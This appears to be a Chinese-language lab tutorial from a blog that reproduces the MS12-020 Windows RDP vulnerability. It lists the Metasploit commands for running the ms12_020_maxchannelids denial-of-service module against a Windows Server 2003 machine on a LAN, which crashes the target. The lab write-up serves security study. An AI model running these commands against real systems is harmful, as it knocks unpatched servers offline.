漏洞名:MS12-020(全称:Microsoft windows远程桌面协议RDP远程代码执行漏洞)
介绍:RDP协议是一个多通道的协议,让用户连上提供微软终端机服务的电脑。 windows在处理某些对象时存在错误,可通过特制的RDP报文访问未初始化或已经删除的对象,导致任意代码执行。 然后控制系统。
实验环境:
攻击机(kali 2021):IP地址 192.168.5.111
目标机(windows server 2003):IP地址 192.168.5.152
实验注意事项:
目标机3389端口必须开放,攻击机与目标机必须在同一局域网下,目标机防火墙必须关闭,目标机没有安装ms12-020漏洞补丁。
注:其实windows server 2003系统安装好后,默认是关闭windows防火墙的,3389是默认关闭的,这里大家注意一下同步环境,以免模仿出错。
实验开始:
1.用kali自带的nmap工具查看目标机端口开放情况,确认目标windows2003电脑 3389端口已开,这样就可以利用ms12-020漏洞进行攻击了。
2.启动msfconsole工具
输入命令:search ms12-020 搜索查看ms12-020漏洞利用的攻击模块。
3.搜索到ms12-020漏洞,有2个可以利用的模块。使用其中任意一个攻击模块,然后配置其参数。
使用这个攻击模块: use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
查看需要配置的参数: show options
设置需要攻击的目标ip: set rhosts 192.168.5.152
查看参数是否配置成功,这里很明显是配置成功了:show options
4.运行配置好的模块
运行: run
这里我们看到出现seems down 表示攻击成功,已经致使目标机蓝屏了。
实验结果截图:
发表评论